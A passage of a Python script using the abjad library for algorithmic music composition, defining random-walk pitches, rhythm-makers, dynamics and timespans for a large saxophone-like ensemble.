mapped_list=alto_3_walk_chord
)
]
alto_4_walk_chord = rotate(mirrored_walk_list, 42)
alto_4_random_walk_notes = [x for x in randomWalk(
random_seed=8,
length=1000,
step_list=[1],
mapped_list=alto_4_walk_chord
)
]
alto_5_walk_chord = rotate(mirrored_walk_list, 26)
alto_5_random_walk_notes = [x for x in randomWalk(
random_seed=9,
length=1000,
step_list=[1],
mapped_list=alto_5_walk_chord
)
]
alto_6_walk_chord = rotate(mirrored_walk_list, 4)
alto_6_random_walk_notes = [x for x in randomWalk(
random_seed=10,
length=1000,
step_list=[1],
mapped_list=alto_6_walk_chord
)
]
tenor_1_walk_chord = rotate(mirrored_walk_list, 36)
tenor_1_random_walk_notes = [x for x in randomWalk(
random_seed=11,
length=1000,
step_list=[1],
mapped_list=tenor_1_walk_chord
)
]
tenor_2_walk_chord = rotate(mirrored_walk_list, 14)
tenor_2_random_walk_notes = [x for x in randomWalk(
random_seed=12,
length=1000,
step_list=[1],
mapped_list=tenor_2_walk_chord
)
]
tenor_3_walk_chord = rotate(mirrored_walk_list, 0)
tenor_3_random_walk_notes = [x for x in randomWalk(
random_seed=13,
length=1000,
step_list=[1],
mapped_list=tenor_3_walk_chord
)
]
tenor_4_walk_chord = rotate(mirrored_walk_list, 36)
tenor_4_random_walk_notes = [x for x in randomWalk(
random_seed=14,
length=1000,
step_list=[1],
mapped_list=tenor_4_walk_chord
)
]
tenor_5_walk_chord = rotate(mirrored_walk_list, 14)
tenor_5_random_walk_notes = [x for x in randomWalk(
random_seed=15,
length=1000,
step_list=[1],
mapped_list=tenor_5_walk_chord
)
]
baritone_1_walk_chord = rotate(mirrored_walk_list, 28)
baritone_1_random_walk_notes = [x for x in randomWalk(
random_seed=16,
length=1000,
step_list=[1],
mapped_list=baritone_1_walk_chord
)
]
baritone_2_walk_chord = rotate(mirrored_walk_list, 14)
baritone_2_random_walk_notes = [x for x in randomWalk(
random_seed=17,
length=1000,
step_list=[1],
mapped_list=baritone_2_walk_chord
)
]
baritone_3_walk_chord = rotate(mirrored_walk_list, 10)
baritone_3_random_walk_notes = [x for x in randomWalk(
random_seed=18,
length=1000,
step_list=[1],
mapped_list=baritone_3_walk_chord
)
]
bass_1_walk_chord = rotate(mirrored_walk_list, 24)
bass_1_random_walk_notes = [x for x in randomWalk(
random_seed=19,
length=1000,
step_list=[1],
mapped_list=bass_1_walk_chord
)
]
bass_2_walk_chord = rotate(mirrored_walk_list, 20)
bass_2_random_walk_notes = [x for x in randomWalk(
random_seed=20,
length=1000,
step_list=[1],
mapped_list=bass_2_walk_chord
)
]
contrabass_walk_chord = rotate(mirrored_walk_list, 6)
contrabass_random_walk_notes = [x for x in randomWalk(
random_seed=21,
length=1000,
step_list=[1],
mapped_list=contrabass_walk_chord
)
]
# Define rhythm-makers: two to be sued by the MusicMaker, one for silence.
rmaker_one = abjadext.rmakers.NoteRhythmMaker()
rmaker_two = abjadext.rmakers.TaleaRhythmMaker(
talea=abjadext.rmakers.Talea(
counts=[1, 1, 1, 1, 1, 2, 2, 1, 2, 1, 3, 2, 2, 3, 2, 1, 1, 2, 1, 1, 1, 3, ],
denominator=16,
),
beam_specifier=abjadext.rmakers.BeamSpecifier(
beam_divisions_together=True,
beam_rests=False,
),
extra_counts_per_division=[-1, 0, 1, -1, 1, 0, ],
# burnish_specifier=abjadext.rmakers.BurnishSpecifier(
# left_classes=[abjad.Note, abjad.Rest],
# left_counts=[1, 0, 1],
# ),
logical_tie_masks=[
abjadext.rmakers.silence([8], 5),
],
division_masks=[
abjadext.rmakers.SilenceMask(
pattern=abjad.index([2], 11),
),
],
tuplet_specifier=abjadext.rmakers.TupletSpecifier(
trivialize=True,
extract_trivial=True,
rewrite_rest_filled=True,
rewrite_sustained=True,
),
)
# Initialize AttachmentHandler
attachment_handler_one = AttachmentHandler(
starting_dynamic='mp',
ending_dynamic='f',
hairpin='<',
# articulation_list=['tenuto'],
)
attachment_handler_two = AttachmentHandler(
starting_dynamic='mf',
ending_dynamic='pp',
hairpin='>',
# articulation_list=['tenuto'],
)
# Initialize MusicMakers with the rhythm-makers.
#####sopranino#####
sopranino_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=sopranino_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
sopranino_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=sopranino_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
sopranino_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=sopranino_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####soprano_one#####
soprano_one_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=soprano_1_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
soprano_one_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_1_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
soprano_one_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_1_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####soprano_two#####
soprano_two_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=soprano_2_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
soprano_two_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_2_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
soprano_two_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_2_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####soprano_three#####
soprano_three_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=soprano_3_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
soprano_three_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_3_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
soprano_three_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_3_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####alto_one#####
alto_one_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=alto_1_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_one_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_1_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_one_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_1_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####alto_two#####
alto_two_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=alto_2_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_two_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_2_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_two_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_2_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####alto_three#####
alto_three_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=alto_3_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_three_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_3_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_three_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=soprano_3_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####alto_four#####
alto_four_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=alto_4_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_four_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=alto_4_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_four_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=alto_4_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####alto_five#####
alto_five_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=alto_5_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_five_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=alto_5_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_five_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=alto_5_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####alto_six#####
alto_six_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=alto_6_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_six_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=alto_6_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
alto_six_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=alto_6_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####tenor_one#####
tenor_one_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=tenor_1_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
tenor_one_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=tenor_1_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
tenor_one_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=tenor_1_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####tenor_two#####
tenor_two_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=tenor_2_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
tenor_two_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=tenor_2_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
tenor_two_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=tenor_2_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####tenor_three#####
tenor_three_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=tenor_3_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
tenor_three_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=tenor_3_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
tenor_three_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=tenor_3_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####tenor_four#####
tenor_four_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=tenor_4_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
tenor_four_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=tenor_4_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
tenor_four_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=tenor_4_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####tenor_five#####
tenor_five_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=tenor_5_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
tenor_five_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=tenor_5_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
tenor_five_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=tenor_5_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####baritone_one#####
baritone_one_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=baritone_1_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
baritone_one_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=baritone_1_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
baritone_one_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=baritone_1_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####baritone_two#####
baritone_two_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=baritone_2_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
baritone_two_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=baritone_2_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
baritone_two_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=baritone_2_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####baritone_three#####
baritone_three_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=baritone_3_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
baritone_three_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=baritone_3_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
baritone_three_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=baritone_3_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####bass_one#####
bass_one_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=bass_1_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
bass_one_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=bass_1_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
bass_one_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=bass_1_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####bass_two#####
bass_two_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=bass_2_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
bass_two_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=bass_2_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
bass_two_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=bass_2_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
#####contrabass#####
contrabass_musicmaker_one = MusicMaker(
rmaker=rmaker_one,
pitches=contrabass_chord,
continuous=True,
attachment_handler=attachment_handler_one,
)
contrabass_musicmaker_two = MusicMaker(
rmaker=rmaker_two,
pitches=contrabass_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_one,
)
contrabass_musicmaker_three = MusicMaker(
rmaker=rmaker_two,
pitches=contrabass_random_walk_notes,
continuous=True,
attachment_handler=attachment_handler_two,
)
silence_maker = abjadext.rmakers.NoteRhythmMaker(
division_masks=[
abjadext.rmakers.SilenceMask(
pattern=abjad.index([0], 1),
),
],
)
# Define a small class so that we can annotate timespans with additional
# information:
class MusicSpecifier:
def __init__(self, music_maker, voice_name):
self.music_maker = music_maker
self.voice_name = voice_name
# Define an initial timespan structure, annotated with music specifiers. This
# structure has not been split along meter boundaries. This structure does not
# contain timespans explicitly representing silence. Here I make four, one
# for each voice, using Python's list comprehension syntax to save some
# space.
print('Collecting timespans and rmakers ...')
voice_1_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 1',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), sopranino_musicmaker_two],
[(2, 8), (4, 8), sopranino_musicmaker_three],
[(4, 8), (6, 8), sopranino_musicmaker_two],
[(6, 8), (8, 8), sopranino_musicmaker_two],
[(8, 8), (10, 8), sopranino_musicmaker_three],
[(10, 8), (12, 8), sopranino_musicmaker_two],
[(12, 8), (14, 8), sopranino_musicmaker_two],
[(14, 8), (16, 8), sopranino_musicmaker_two],
[(16, 8), (18, 8), sopranino_musicmaker_three],
[(18, 8), (20, 8), sopranino_musicmaker_two],
[(20, 8), (22, 8), sopranino_musicmaker_two],
[(22, 8), (24, 8), sopranino_musicmaker_two],
[(24, 8), (26, 8), sopranino_musicmaker_two],
[(26, 8), (28, 8), sopranino_musicmaker_three],
[(28, 8), (30, 8), sopranino_musicmaker_two],
[(30, 8), (32, 8), sopranino_musicmaker_two],
[(32, 8), (34, 8), sopranino_musicmaker_two],
[(34, 8), (36, 8), sopranino_musicmaker_two],
[(36, 8), (38, 8), sopranino_musicmaker_three],
[(38, 8), (40, 8), sopranino_musicmaker_three],
[(40, 8), (42, 8), sopranino_musicmaker_two],
[(42, 8), (44, 8), sopranino_musicmaker_two],
[(44, 8), (46, 8), sopranino_musicmaker_two],
[(46, 8), (48, 8), sopranino_musicmaker_three],
[(48, 8), (50, 8), sopranino_musicmaker_three],
[(50, 8), (52, 8), sopranino_musicmaker_three],
[(52, 8), (54, 8), sopranino_musicmaker_two],
[(54, 8), (56, 8), sopranino_musicmaker_two],
[(56, 8), (58, 8), sopranino_musicmaker_three],
[(58, 8), (60, 8), sopranino_musicmaker_three],
[(60, 8), (62, 8), sopranino_musicmaker_three],
[(62, 8), (64, 8), sopranino_musicmaker_two],
[(64, 8), (66, 8), sopranino_musicmaker_two],
[(66, 8), (68, 8), sopranino_musicmaker_three],
[(68, 8), (70, 8), sopranino_musicmaker_three],
[(70, 8), (72, 8), sopranino_musicmaker_two],
[(72, 8), (74, 8), sopranino_musicmaker_three],
[(74, 8), (76, 8), sopranino_musicmaker_three],
[(76, 8), (78, 8), sopranino_musicmaker_two],
[(78, 8), (80, 8), sopranino_musicmaker_three],
[(80, 8), (82, 8), sopranino_musicmaker_three],
[(82, 8), (84, 8), sopranino_musicmaker_three],
[(84, 8), (86, 8), sopranino_musicmaker_three],
[(86, 8), (88, 8), sopranino_musicmaker_two],
[(88, 8), (90, 8), sopranino_musicmaker_two],
[(90, 8), (92, 8), sopranino_musicmaker_two],
[(92, 8), (94, 8), sopranino_musicmaker_two],
[(94, 8), (96, 8), sopranino_musicmaker_three],
[(96, 8), (98, 8), sopranino_musicmaker_three],
[(98, 8), (100, 8), sopranino_musicmaker_three],
[(100, 8), (102, 8), sopranino_musicmaker_three],
[(102, 8), (104, 8), sopranino_musicmaker_two],
# [(104, 8), (106, 8), sopranino_musicmaker_two],
# [(106, 8), (108, 8), sopranino_musicmaker_two],
# [(108, 8), (110, 8), sopranino_musicmaker_three],
# [(110, 8), (112, 8), sopranino_musicmaker_two],
#
# [(112, 8), (114, 8), sopranino_musicmaker_two],
# [(114, 8), (116, 8), sopranino_musicmaker_three],
# [(116, 8), (118, 8), sopranino_musicmaker_three],
# [(118, 8), (120, 8), sopranino_musicmaker_two],
#
# [(120, 8), (122, 8), sopranino_musicmaker_two],
# [(122, 8), (124, 8), sopranino_musicmaker_three],
# [(124, 8), (126, 8), sopranino_musicmaker_two],
# [(126, 8), (128, 8), sopranino_musicmaker_two],
#
# [(128, 8), (130, 8), sopranino_musicmaker_two],
# [(130, 8), (132, 8), sopranino_musicmaker_three],
# [(132, 8), (134, 8), sopranino_musicmaker_two],
# [(134, 8), (136, 8), sopranino_musicmaker_three],
# [(136, 8), (138, 8), sopranino_musicmaker_three],
# [(138, 8), (140, 8), sopranino_musicmaker_three],
# [(140, 8), (142, 8), sopranino_musicmaker_two],
# [(142, 8), (144, 8), sopranino_musicmaker_two],
#
# [(144, 8), (146, 8), sopranino_musicmaker_three],
# [(146, 8), (148, 8), sopranino_musicmaker_three],
# [(148, 8), (150, 8), sopranino_musicmaker_three],
# [(150, 8), (152, 8), sopranino_musicmaker_two],
#
# [(152, 8), (154, 8), sopranino_musicmaker_two],
# [(154, 8), (156, 8), sopranino_musicmaker_three],
# [(156, 8), (158, 8), sopranino_musicmaker_three],
# [(158, 8), (160, 8), sopranino_musicmaker_three],
#
# [(160, 8), (162, 8), sopranino_musicmaker_two],
# [(162, 8), (164, 8), sopranino_musicmaker_two],
# [(164, 8), (166, 8), sopranino_musicmaker_two],
# [(166, 8), (168, 8), sopranino_musicmaker_three],
#
# [(168, 8), (170, 8), sopranino_musicmaker_two],
# [(170, 8), (172, 8), sopranino_musicmaker_three],
# [(172, 8), (174, 8), sopranino_musicmaker_three],
# [(174, 8), (176, 8), sopranino_musicmaker_two],
#
# [(176, 8), (178, 8), sopranino_musicmaker_two],
# [(178, 8), (180, 8), sopranino_musicmaker_two],
# [(180, 8), (182, 8), sopranino_musicmaker_three],
# [(182, 8), (184, 8), sopranino_musicmaker_three],
#
# [(184, 8), (186, 8), sopranino_musicmaker_two],
# [(186, 8), (188, 8), sopranino_musicmaker_three],
# [(188, 8), (190, 8), sopranino_musicmaker_two],
# [(190, 8), (192, 8), sopranino_musicmaker_two],
#
# [(192, 8), (194, 8), sopranino_musicmaker_two],
# [(194, 8), (196, 8), sopranino_musicmaker_three],
# [(196, 8), (198, 8), sopranino_musicmaker_three],
# [(198, 8), (199, 8), sopranino_musicmaker_three],
# [(199, 8), (200, 8), silence_maker],
]
])
voice_2_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 2',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), soprano_one_musicmaker_two],
[(2, 8), (4, 8), soprano_one_musicmaker_two],
[(4, 8), (6, 8), soprano_one_musicmaker_two],
[(6, 8), (8, 8), soprano_one_musicmaker_two],
[(8, 8), (10, 8), soprano_one_musicmaker_two],
[(10, 8), (12, 8), soprano_one_musicmaker_three],
[(12, 8), (14, 8), soprano_one_musicmaker_two],
[(14, 8), (16, 8), soprano_one_musicmaker_three],
[(16, 8), (18, 8), soprano_one_musicmaker_three],
[(18, 8), (20, 8), soprano_one_musicmaker_three],
[(20, 8), (22, 8), soprano_one_musicmaker_two],
[(22, 8), (24, 8), soprano_one_musicmaker_three],
[(24, 8), (26, 8), soprano_one_musicmaker_three],
[(26, 8), (28, 8), soprano_one_musicmaker_three],
[(28, 8), (30, 8), soprano_one_musicmaker_two],
[(30, 8), (32, 8), soprano_one_musicmaker_two],
[(32, 8), (34, 8), soprano_one_musicmaker_two],
[(34, 8), (36, 8), soprano_one_musicmaker_two],
[(36, 8), (38, 8), soprano_one_musicmaker_two],
[(38, 8), (40, 8), soprano_one_musicmaker_three],
[(40, 8), (42, 8), soprano_one_musicmaker_three],
[(42, 8), (44, 8), soprano_one_musicmaker_three],
[(44, 8), (46, 8), soprano_one_musicmaker_three],
[(46, 8), (48, 8), soprano_one_musicmaker_two],
[(48, 8), (50, 8), soprano_one_musicmaker_two],
[(50, 8), (52, 8), soprano_one_musicmaker_two],
[(52, 8), (54, 8), soprano_one_musicmaker_two],
[(54, 8), (56, 8), soprano_one_musicmaker_three],
[(56, 8), (58, 8), soprano_one_musicmaker_three],
[(58, 8), (60, 8), soprano_one_musicmaker_three],
[(60, 8), (62, 8), soprano_one_musicmaker_two],
[(62, 8), (64, 8), soprano_one_musicmaker_three],
[(64, 8), (66, 8), soprano_one_musicmaker_three],
[(66, 8), (68, 8), soprano_one_musicmaker_three],
[(68, 8), (70, 8), soprano_one_musicmaker_two],
[(70, 8), (72, 8), soprano_one_musicmaker_two],
[(72, 8), (74, 8), soprano_one_musicmaker_two],
[(74, 8), (76, 8), soprano_one_musicmaker_two],
[(76, 8), (78, 8), soprano_one_musicmaker_three],
[(78, 8), (80, 8), soprano_one_musicmaker_three],
[(80, 8), (82, 8), soprano_one_musicmaker_three],
[(82, 8), (84, 8), soprano_one_musicmaker_two],
[(84, 8), (86, 8), soprano_one_musicmaker_two],
[(86, 8), (88, 8), soprano_one_musicmaker_three],
[(88, 8), (90, 8), soprano_one_musicmaker_two],
[(90, 8), (92, 8), soprano_one_musicmaker_two],
[(92, 8), (94, 8), soprano_one_musicmaker_two],
[(94, 8), (96, 8), soprano_one_musicmaker_three],
[(96, 8), (98, 8), soprano_one_musicmaker_three],
[(98, 8), (100, 8), soprano_one_musicmaker_three],
[(100, 8), (102, 8), soprano_one_musicmaker_two],
[(102, 8), (104, 8), soprano_one_musicmaker_two],
# [(104, 8), (106, 8), soprano_one_musicmaker_two],
# [(106, 8), (108, 8), soprano_one_musicmaker_two],
# [(108, 8), (110, 8), soprano_one_musicmaker_three],
# [(110, 8), (112, 8), soprano_one_musicmaker_three],
#
# [(112, 8), (114, 8), soprano_one_musicmaker_two],
# [(114, 8), (116, 8), soprano_one_musicmaker_two],
# [(116, 8), (118, 8), soprano_one_musicmaker_two],
# [(118, 8), (120, 8), soprano_one_musicmaker_three],
#
# [(120, 8), (122, 8), soprano_one_musicmaker_three],
# [(122, 8), (124, 8), soprano_one_musicmaker_three],
# [(124, 8), (126, 8), soprano_one_musicmaker_two],
# [(126, 8), (128, 8), soprano_one_musicmaker_two],
#
# [(128, 8), (130, 8), soprano_one_musicmaker_two],
# [(130, 8), (132, 8), soprano_one_musicmaker_two],
# [(132, 8), (134, 8), soprano_one_musicmaker_three],
# [(134, 8), (136, 8), soprano_one_musicmaker_three],
# [(136, 8), (138, 8), soprano_one_musicmaker_three],
# [(138, 8), (140, 8), soprano_one_musicmaker_two],
# [(140, 8), (142, 8), soprano_one_musicmaker_two],
# [(142, 8), (144, 8), soprano_one_musicmaker_three],
#
# [(144, 8), (146, 8), soprano_one_musicmaker_two],
# [(146, 8), (148, 8), soprano_one_musicmaker_three],
# [(148, 8), (150, 8), soprano_one_musicmaker_three],
# [(150, 8), (152, 8), soprano_one_musicmaker_two],
#
# [(152, 8), (154, 8), soprano_one_musicmaker_two],
# [(154, 8), (156, 8), soprano_one_musicmaker_two],
# [(156, 8), (158, 8), soprano_one_musicmaker_two],
# [(158, 8), (160, 8), soprano_one_musicmaker_three],
#
# [(160, 8), (162, 8), soprano_one_musicmaker_three],
# [(162, 8), (164, 8), soprano_one_musicmaker_three],
# [(164, 8), (166, 8), soprano_one_musicmaker_three],
# [(166, 8), (168, 8), soprano_one_musicmaker_three],
#
# [(168, 8), (170, 8), soprano_one_musicmaker_two],
# [(170, 8), (172, 8), soprano_one_musicmaker_three],
# [(172, 8), (174, 8), soprano_one_musicmaker_two],
# [(174, 8), (176, 8), soprano_one_musicmaker_two],
#
# [(176, 8), (178, 8), soprano_one_musicmaker_two],
# [(178, 8), (180, 8), soprano_one_musicmaker_three],
# [(180, 8), (182, 8), soprano_one_musicmaker_two],
# [(182, 8), (184, 8), soprano_one_musicmaker_two],
#
# [(184, 8), (186, 8), soprano_one_musicmaker_three],
# [(186, 8), (188, 8), soprano_one_musicmaker_two],
# [(188, 8), (190, 8), soprano_one_musicmaker_three],
# [(190, 8), (192, 8), soprano_one_musicmaker_three],
#
# [(192, 8), (194, 8), soprano_one_musicmaker_three],
# [(194, 8), (196, 8), soprano_one_musicmaker_two],
# [(196, 8), (198, 8), soprano_one_musicmaker_two],
# [(198, 8), (199, 8), soprano_one_musicmaker_two],
]
])
voice_3_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 3',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), soprano_two_musicmaker_three],
[(2, 8), (4, 8), soprano_two_musicmaker_three],
[(4, 8), (6, 8), soprano_two_musicmaker_two],
[(6, 8), (8, 8), soprano_two_musicmaker_two],
[(8, 8), (10, 8), soprano_two_musicmaker_three],
[(10, 8), (12, 8), soprano_two_musicmaker_three],
[(12, 8), (14, 8), soprano_two_musicmaker_two],
[(14, 8), (16, 8), soprano_two_musicmaker_three],
[(16, 8), (18, 8), soprano_two_musicmaker_two],
[(18, 8), (20, 8), soprano_two_musicmaker_three],
[(20, 8), (22, 8), soprano_two_musicmaker_two],
[(22, 8), (24, 8), soprano_two_musicmaker_two],
[(24, 8), (26, 8), soprano_two_musicmaker_three],
[(26, 8), (28, 8), soprano_two_musicmaker_three],
[(28, 8), (30, 8), soprano_two_musicmaker_two],
[(30, 8), (32, 8), soprano_two_musicmaker_three],
[(32, 8), (34, 8), soprano_two_musicmaker_three],
[(34, 8), (36, 8), soprano_two_musicmaker_three],
[(36, 8), (38, 8), soprano_two_musicmaker_three],
[(38, 8), (40, 8), soprano_two_musicmaker_two],
[(40, 8), (42, 8), soprano_two_musicmaker_three],
[(42, 8), (44, 8), soprano_two_musicmaker_two],
[(44, 8), (46, 8), soprano_two_musicmaker_two],
[(46, 8), (48, 8), soprano_two_musicmaker_three],
[(48, 8), (50, 8), soprano_two_musicmaker_two],
[(50, 8), (52, 8), soprano_two_musicmaker_three],
[(52, 8), (54, 8), soprano_two_musicmaker_three],
[(54, 8), (56, 8), soprano_two_musicmaker_two],
[(56, 8), (58, 8), soprano_two_musicmaker_three],
[(58, 8), (60, 8), soprano_two_musicmaker_two],
[(60, 8), (62, 8), soprano_two_musicmaker_three],
[(62, 8), (64, 8), soprano_two_musicmaker_two],
[(64, 8), (66, 8), soprano_two_musicmaker_three],
[(66, 8), (68, 8), soprano_two_musicmaker_three],
[(68, 8), (70, 8), soprano_two_musicmaker_two],
[(70, 8), (72, 8), soprano_two_musicmaker_three],
[(72, 8), (74, 8), soprano_two_musicmaker_two],
[(74, 8), (76, 8), soprano_two_musicmaker_two],
[(76, 8), (78, 8), soprano_two_musicmaker_three],
[(78, 8), (80, 8), soprano_two_musicmaker_three],
[(80, 8), (82, 8), soprano_two_musicmaker_three],
[(82, 8), (84, 8), soprano_two_musicmaker_two],
[(84, 8), (86, 8), soprano_two_musicmaker_two],
[(86, 8), (88, 8), soprano_two_musicmaker_two],
[(88, 8), (90, 8), soprano_two_musicmaker_two],
[(90, 8), (92, 8), soprano_two_musicmaker_three],
[(92, 8), (94, 8), soprano_two_musicmaker_three],
[(94, 8), (96, 8), soprano_two_musicmaker_three],
[(96, 8), (98, 8), soprano_two_musicmaker_three],
[(98, 8), (100, 8), soprano_two_musicmaker_two],
[(100, 8), (102, 8), soprano_two_musicmaker_two],
[(102, 8), (104, 8), soprano_two_musicmaker_two],
# [(104, 8), (106, 8), soprano_two_musicmaker_two],
# [(106, 8), (108, 8), soprano_two_musicmaker_three],
# [(108, 8), (110, 8), soprano_two_musicmaker_three],
